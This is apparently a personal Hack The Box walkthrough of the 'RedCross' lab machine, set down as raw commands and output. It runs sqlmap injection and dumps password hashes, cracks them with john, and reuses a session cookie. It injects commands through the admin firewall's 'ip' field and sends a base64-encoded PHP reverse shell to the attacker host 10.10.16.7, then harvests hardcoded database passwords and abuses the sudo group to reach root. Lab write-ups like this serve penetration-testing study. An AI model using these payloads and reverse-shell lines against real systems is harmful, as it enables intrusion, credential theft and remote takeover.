RedCross
Tue, 15 October 2024
Platform: Hack The Box
sudo nmap 10.10.10.113 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Nmap scan report for 10.10.10.113
Host is up (0.025s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u3 (protocol 2.0)
| ssh-hostkey:
| 2048 67:d3:85:f8:ee:b8:06:23:59:d7:75:8e:a2:37:d0:a6 (RSA)
| 256 89:b4:65:27:1f:93:72:1a:bc:e3:22:70:90:db:35:96 (ECDSA)
|_ 256 66:bd:a1:1c:32:74:32:e2:e6:64:e8:a5:25:1b:4d:67 (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to https://intra.redcross.htb/
443/tcp open ssl/http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to https://intra.redcross.htb/
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=intra.redcross.htb/organizationName=Red Cross International/stateOrProvinceName=NY/countryName=US
| Not valid before: 2018-06-03T19:46:58
|_Not valid after: 2021-02-27T19:46:58
Service Info: Host: redcross.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.12 seconds
...follow redirect to https://intra.redcross.htb/
sudo nano /etc/hosts
10.10.10.113 redcross.htb intra.redcross.htb
feroxbuster -u https://intra.redcross.htb/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -d 3 -q -k -x pdf,txt,php,js | awk '{print " ["$1"]"," "$6}' | awk '/200/{print "\033[32m" $0 "\033[0m"; next}1' | sed '/^ *$/d' | sed '/\[\]/d' | grep -vE 'Auto-filtering|.ico|.css|.png|.gif|.jpg'
[301] https://intra.redcross.htb/images
[302] https://intra.redcross.htb/
[302] https://intra.redcross.htb/index.php
[301] https://intra.redcross.htb/pages
[200] https://intra.redcross.htb/pages/login.php
[200] https://intra.redcross.htb/pages/contact.php
[301] https://intra.redcross.htb/documentation
[200] https://intra.redcross.htb/pages/header.php
feroxbuster -u https://intra.redcross.htb/documentation -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -d 3 -q -k -x pdf,txt,php,js | awk '{print " ["$1"]"," "$6}' | awk '/200/{print "\033[32m" $0 "\033[0m"; next}1' | sed '/^ *$/d' | sed '/\[\]/d' | grep -vE 'Auto-filtering|.ico|.css|.png|.gif|.jpg'
[301] https://intra.redcross.htb/documentation
[200] https://intra.redcross.htb/documentation/account-signup.pdf
https://intra.redcross.htb/documentation/account-signup.pdf
RedCross
dcoumentation dept.
Intranet access request:
Please send a message using our intranet contact form: https://intra.redcross.htb/?page=contact
It’s very important that the subect of the message specifies that you are requesting “credentials”
and also specify an username in the body of the message in the form:
“username=yourdesiredname”
It’s very important to follow this rules to get the account information as fast as possible, otherwise
the message will be sent to our IT administrator who will take care if it when possible.
https://intra.redcross.htb/?page=contact
subject: credentials
body: username=guest
phone: 0000000000
We are processing your request. Temporary credentials have granted for you:
guest:guest
https://intra.redcross.htb/?page=login
guest:guest
Guest Account Info [1]
From: admin (uid 1) To: guest (uid 5)
You're granted with a low privilege access while we're processing your credentials request. Our messaging system still in beta status. Please report if you find any incidence.
UserID [____] Filter
"><svg/onload=alert(document.cookie)>' OR 1-- {{7*7}}
https://intra.redcross.htb/?o=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%27+OR+1--+%7B%7B7*7%7D%7D&page=app
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1
request.txt
GET /?o=2&page=app HTTP/1.1
Host: intra.redcross.htb
Cookie: PHPSESSID=acssi0klmqacrvllm0ri9hrcu2; LANG=EN_US; SINCE=1728598262; LIMIT=10; DOMAIN=intra
Sec-Ch-Ua: "Chromium";v="129", "Not=A?Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://intra.redcross.htb/?o=1&page=app
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close
sqlmap -r request --dbms mysql \
--delay 0 -o --threads 10 --batch \
--dump --proxy http://127.0.0.1:8080
___
__H__
___ ___[,]_____ ___ ___ {1.8.9#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's r
esponsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible
for any misuse or damage caused by this program
[*] starting @ 00:40:38 /2024-10-12/
[00:40:38] [INFO] parsing HTTP request from 'request'
[00:40:38] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been disabled because of its incompatibility with HTTP(s) proxy
[00:40:38] [INFO] flushing session file
[00:40:38] [INFO] testing connection to the target URL
got a 301 redirect to 'https://intra.redcross.htb/?o=1&page=app'. Do you want to follow? [Y/n] Y
[00:40:39] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:40:39] [INFO] testing NULL connection to the target URL
[00:40:40] [INFO] NULL connection is supported with 'skip-read' method
[00:40:40] [INFO] testing if the target URL content is stable
[00:40:41] [WARNING] GET parameter 'o' does not appear to be dynamic
[00:40:41] [INFO] heuristic (basic) test shows that GET parameter 'o' might be injectable (possible DBMS: 'MySQL')
[00:40:42] [INFO] heuristic (XSS) test shows that GET parameter 'o' might be vulnerable to cross-site scripting (XSS) attac
ks
[00:40:42] [INFO] testing for SQL injection on GET parameter 'o'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[00:40:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:40:45] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:41:16] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[00:41:16] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[00:41:16] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[00:41:16] [INFO] testing 'Generic inline queries'
[00:41:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[00:41:47] [WARNING] reflective value(s) found and filtering out
[00:42:13] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[00:43:32] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[00:43:36] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[00:44:40] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[00:44:59] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[00:45:48] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[00:46:21] [INFO] GET parameter 'o' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY cl
ause' injectable
[00:46:21] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[00:46:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[00:46:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[00:46:22] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[00:46:22] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[00:46:23] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[00:46:23] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[00:46:23] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[00:46:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[00:46:24] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[00:46:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[00:46:25] [INFO] GET parameter 'o' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable
GET parameter 'o' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 701 HTTP(s) requests:
Parameter: o (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: o=1%' RLIKE (SELECT (CASE WHEN (6027=6027) THEN 1 ELSE 0x28 END)) AND 'idkc%'='idkc&page=app
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: o=1%' AND EXTRACTVALUE(3990,CONCAT(0x5c,0x716a626271,(SELECT (ELT(3990=3990,1))),0x716a706a71)) AND 'ssNW%'='ssNW&page=app
Database: redcross
Table: users
[5 entries]
+----+------------------------------+--------+--------------------------------------------------------------+----------+
| id | mail | role | password | username |
+----+------------------------------+--------+--------------------------------------------------------------+----------+
| 1 | admin@redcross.htb | 0 | $2y$10$z/d5GiwZuFqjY1jRiKIPzuPXKt0SthLOyU438ajqRBtrb7ZADpwq. | admin |
| 2 | penelope@redcross.htb | 1 | $2y$10$tY9Y955kyFB | penelope |
| 3 | charles@redcross.htb | 1 | $2y$10$bj5Qh0AbUM5 | charles |
| 4 | tricia.wanderloo@contoso.com | 100 | $2y$10$Dnv/b2ZBca2O4cp0fsBbjeQ/0HnhvJ7WrC/ZN3K7QKqTa9SSKP6r. | tricia |
| 5 | non@available | 1000 | $2y$10$U16O2Ylt/uFtzlVbDIzJ8us9ts8f9ITWoPAWcUfK585sZue03YBAi | guest |
+----+------------------------------+--------+--------------------------------------------------------------+----------+
sql-shell>
select * from users [5]:
[*] 0, 1, admin@redcross.htb, $2y$10$z/d5GiwZuFqjY1jRiKIPzuPXKt0SthLOyU438ajqRBtrb7ZADpwq., admin
[*] 1, 2, penelope@redcross.htb, $2y$10$tY9Y955kyFB37GnW4xrC0.J.FzmkrQhxD..vKCQICvwOEgwfxqgAS, penelope
[*] 1, 3, charles@redcross.htb, $2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i, charles
[*] 100, 4, tricia.wanderloo@contoso.com, $2y$10$Dnv/b2ZBca2O4cp0fsBbjeQ/0HnhvJ7WrC/ZN3K7QKqTa9SSKP6r., tricia
[*] 1000, 5, non@available, $2y$10$U16O2Ylt/uFtzlVbDIzJ8us9ts8f9ITWoPAWcUfK585sZue03YBAi, guest
admin:$2y$10$z/d5GiwZuFqjY1jRiKIPzuPXKt0SthLOyU438ajqRBtrb7ZADpwq.
penelope:$2y$10$tY9Y955kyFB37GnW4xrC0.J.FzmkrQhxD..vKCQICvwOEgwfxqgAS
charles:$2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i
tricia:$2y$10$Dnv/b2ZBca2O4cp0fsBbjeQ/0HnhvJ7WrC/ZN3K7QKqTa9SSKP6r.
guest:$2y$10$U16O2Ylt/uFtzlVbDIzJ8us9ts8f9ITWoPAWcUfK585sZue03YBAi
nano hashes
charles:$2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i
john hashes -w=rockyou
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cookiemonster (?)
1g 0:00:00:40 DONE (2024-10-12 02:52) 0.02481g/s 105.4p/s 105.4c/s 105.4C/s sharpay..topgun
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
charles:cookiemonster
https://intra.redcross.htb/?page=login
charles:cookiemonster
From: charles (uid 3) To: penelope (uid 2)
Hey, my chief contacted me complaining about some problem in the admin webapp. I thought that you reinforced security on it... Alerts everywhere!!
gobuster vhost --append-domain -u redcross.htb -k -r -t100 \
-w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://redcross.htb
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: admin.redcross.htb Status: 200 [Size: 795]
Found: *.redcross.htb Status: 400 [Size: 304]
Progress: 100000 / 100001 (100.00%)
===============================================================
Finished
===============================================================
sudo nano /etc/hosts
10.129.132.149 redcross.htb intra.redcross.htb admin.redcross.htb
TARGET=https://admin.redcross.htb
feroxbuster -u $TARGET -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -d 4 -q -k -x pdf,txt,php,js | awk '{print " ["$1"]"," "$6}' | awk '/200/{print "\033[32m" $0 "\033[0m"; next}1' | sed '/^ *$/d' | sed '/\[\]/d' | grep -vE 'Auto-filtering|.ico|.css|.png|.gif|.jpg';
feroxbuster -u $TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -d 4 -q -k -x pdf,txt,php,js | awk '{print " ["$1"]"," "$6}' | awk '/200/{print "\033[32m" $0 "\033[0m"; next}1' | sed '/^ *$/d' | sed '/\[\]/d' | grep -vE 'Auto-filtering|.ico|.css|.png|.gif|.jpg';
[301] https://admin.redcross.htb/images
[200] https://admin.redcross.htb/images/it.svg
[302] https://admin.redcross.htb/
[302] https://admin.redcross.htb/index.php
[301] https://admin.redcross.htb/pages
[200] https://admin.redcross.htb/pages/login.php
[302] https://admin.redcross.htb/pages/users.php
[200] https://admin.redcross.htb/pages/header.php
[301] https://admin.redcross.htb/images
[200] https://admin.redcross.htb/images/it.svg
[302] https://admin.redcross.htb/
[301] https://admin.redcross.htb/pages
[301] https://admin.redcross.htb/javascript
[200] https://admin.redcross.htb/pages/login.php
[302] https://admin.redcross.htb/index.php
[301] https://admin.redcross.htb/phpmyadmin
[302] https://admin.redcross.htb/pages/users.php
[301] https://admin.redcross.htb/phpmyadmin/themes
[301] https://admin.redcross.htb/phpmyadmin/js
[200] https://admin.redcross.htb/phpmyadmin/js/whitelist.php
[200] https://admin.redcross.htb/phpmyadmin/js/get_image.js.php
[200] https://admin.redcross.htb/phpmyadmin/doc/html/index.html
[200] https://admin.redcross.htb/phpmyadmin/index.php
[200] https://admin.redcross.htb/phpmyadmin/logout.php
[200] https://admin.redcross.htb/phpmyadmin/js/get_scripts.js.php
[302] https://admin.redcross.htb/phpmyadmin/url.php
[200] https://admin.redcross.htb/phpmyadmin/themes.php
[200] https://admin.redcross.htb/phpmyadmin/db_structure.php
[200] https://admin.redcross.htb/phpmyadmin/js/messages.php
[301] https://admin.redcross.htb/phpmyadmin/themes/original
https://admin.redcross.htb/phpmyadmin/doc/html/index.html
phpMyAdmin 4.6.6 documentation »
"cookiemonster" hint of cookie re-use
login > charles:cookiemonster > intra
https://intra.redcross.htb/?page=app
PHPSESSID=en2pnq6rs08lohhut6207mjsm6
admin > edit cookie value > refresh > dashboard
https://admin.redcross.htb/?page=cpanel
PHPSESSID=en2pnq6rs08lohhut6207mjsm6
https://admin.redcross.htb/?page=firewall
POST /pages/actions.php HTTP/1.1
Host: admin.redcross.htb
Cookie: PHPSESSID=en2pnq6rs08lohhut6207mjsm6
Content-Length: 47
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="129", "Not=A?Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Origin: https://admin.redcross.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://admin.redcross.htb/?page=firewall
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close
ip=10.10.16.7;cat /etc/passwd&id=12&action=deny
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
rtkit:x:105:109:RealtimeKit,,,:/proc:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
lightdm:x:110:113:Light Display Manager:/var/lib/lightdm:/bin/false
pulse:x:111:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
avahi:x:112:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
saned:x:113:118::/var/lib/saned:/bin/false
penelope:x:1000:1000:Penelope,,,:/home/penelope:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
postgres:x:115:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ftp:x:108:122:ftp daemon,,,:/srv/ftp:/bin/false
systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
php -r '$sock=fsockopen("10.10.16.7",4435);popen("/bin/bash <&3 >&3 2>&3", "r");'
;echo+$(echo+cGhwIC1yICckc29jaz1mc29ja29wZW4oIjEwLjEwLjE2LjciLDQ0MzUpO3BvcGVuKCIvYmluL2Jhc2ggPCYzID4mMyAyPiYzIiwgInIiKTsn+|+base64+-d)+|bash
POST /pages/actions.php HTTP/1.1
Host: admin.redcross.htb
Cookie: PHPSESSID=en2pnq6rs08lohhut6207mjsm6
Content-Length: 171
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="129", "Not=A?Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Origin: https://admin.redcross.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://admin.redcross.htb/?page=firewall
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close
ip=10.10.16.7;echo+$(echo+cGhwIC1yICckc29jaz1mc29ja29wZW4oIjEwLjEwLjE2LjciLDQ0MzUpO3BvcGVuKCIvYmluL2Jhc2ggPCYzID4mMyAyPiYzIiwgInIiKTsn+|+base64+-d)+|bash&id=12&action=deny
nc -lvnp 4435
Listening on 0.0.0.0 4435
Connection received on 10.10.10.113 60238
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@redcross:/var/www$ grep -r -ine 'passw'
html/admin/pages/login.php:7: echo "<tr><td align='right'>Password</td><td><input type='password' name='pass'></input></td></tr>";
html/admin/pages/firewall.php:7: $dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
html/admin/pages/users.php:7: $dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixnss password=fios@ew023xnw");
html/admin/pages/users.php:8: $result = pg_prepare($dbconn, "q1", "SELECT * FROM passwd_table WHERE gid = 1001");
html/admin/pages/actions.php:32: $sql=$mysqli->prepare("SELECT id, password, mail, role FROM users WHERE username = ?");
html/admin/pages/actions.php:44: if(password_verify($pass,$hash) and $role==0){
html/admin/pages/actions.php:66: } else if(password_verify($pass,$hash)){
html/admin/pages/actions.php:95: $dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
html/admin/pages/actions.php:109: $dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
html/admin/pages/actions.php:116: $passw=generateRandomString();
html/admin/pages/actions.php:117: $phash=crypt($passw);
html/admin/pages/actions.php:118: $dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");
html/admin/pages/actions.php:119: $result = pg_prepare($dbconn, "q1", "insert into passwd_table (username, passwd, gid, homedir) values ($1, $2, 1001, '/var/jail/home')");
html/admin/pages/actions.php:122: echo "<b>$username : $passw</b><br><br><a href=/?page=users>Continue</a>";
html/admin/pages/actions.php:127: $dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");
html/admin/pages/actions.php:128: $result = pg_prepare($dbconn, "q1", "delete from passwd_table where uid = $1");
html/intra/pages/login.php:7: echo "<tr><td align='right'>Password</td><td><input type='password' name='pass'></input></td></tr>";
html/intra/pages/actions.php:27: $sql=$mysqli->prepare("SELECT id, password, mail, role FROM users WHERE username = ?");
html/intra/pages/actions.php:39: if(password_verify($pass,$hash)){
$dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
$dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixnss password=fios@ew023xnw");
$dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
$dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
$dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");
$dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");
https://admin.redcross.htb/?page=users
Add user via admin portal:
Provide this credentials to the user:
daddybigfish : Jokf8n7K
Username UID GID
daddybigfish 2020 1001
psql -h 127.0.0.1 -d unix -U unixusrmgr -W
Password: dheu%7wjx8B&
unix=> \dt
List of relations
Schema | Name | Type | Owner
--------+--------------+-------+----------
public | group_table | table | postgres
public | passwd_table | table | postgres
public | shadow_table | table | postgres
public | usergroups | table | postgres
(4 rows)
unix=> select * from passwd_table;
username | passwd | uid | gid | gecos | homedir | shell
--------------+------------------------------------+------+------+-------+----------------+-----------
tricia | $1$WFsH/kvS$5gAjMYSvbpZFNu//uMPmp. | 2018 | 1001 | | /var/jail/home | /bin/bash
daddybigfish | $1$2tXNdrha$scEI2bk3x54PJHT3fui.T. | 2020 | 1001 | | /var/jail/home | /bin/bash
(1 row)
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:penelope
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:penelope
floppy:x:25:penelope
tape:x:26:
sudo:x:27:
unix=> update passwd_table set gid=27 where username='daddybigfish'; UPDATE 1
unix=> select * from passwd_table;
username | passwd | uid | gid | gecos | homedir | shell
--------------+------------------------------------+------+------+-------+----------------+-----------
tricia | $1$WFsH/kvS$5gAjMYSvbpZFNu//uMPmp. | 2018 | 1001 | | /var/jail/home | /bin/bash
daddybigfish | $1$2tXNdrha$scEI2bk3x54PJHT3fui.T. | 2020 | 27 | | /var/jail/home | /bin/bash
(1 row)
daddybigfish:Jokf8n7K
ssh daddybigfish@10.10.10.113
id
uid=2020(daddybigfish) gid=27(sudo) groups=27(sudo)
sudo -l
User daddybigfish may run the following commands on redcross:
(ALL : ALL) ALL
sudo su
id
uid=0(root) gid=0(root) groups=0(root)
cat /home/penelope/user.txt
9a7662428920bbc36cbf243c6750f703
cat /root/root.txt
270a427d7503fb59b552d77842ff814b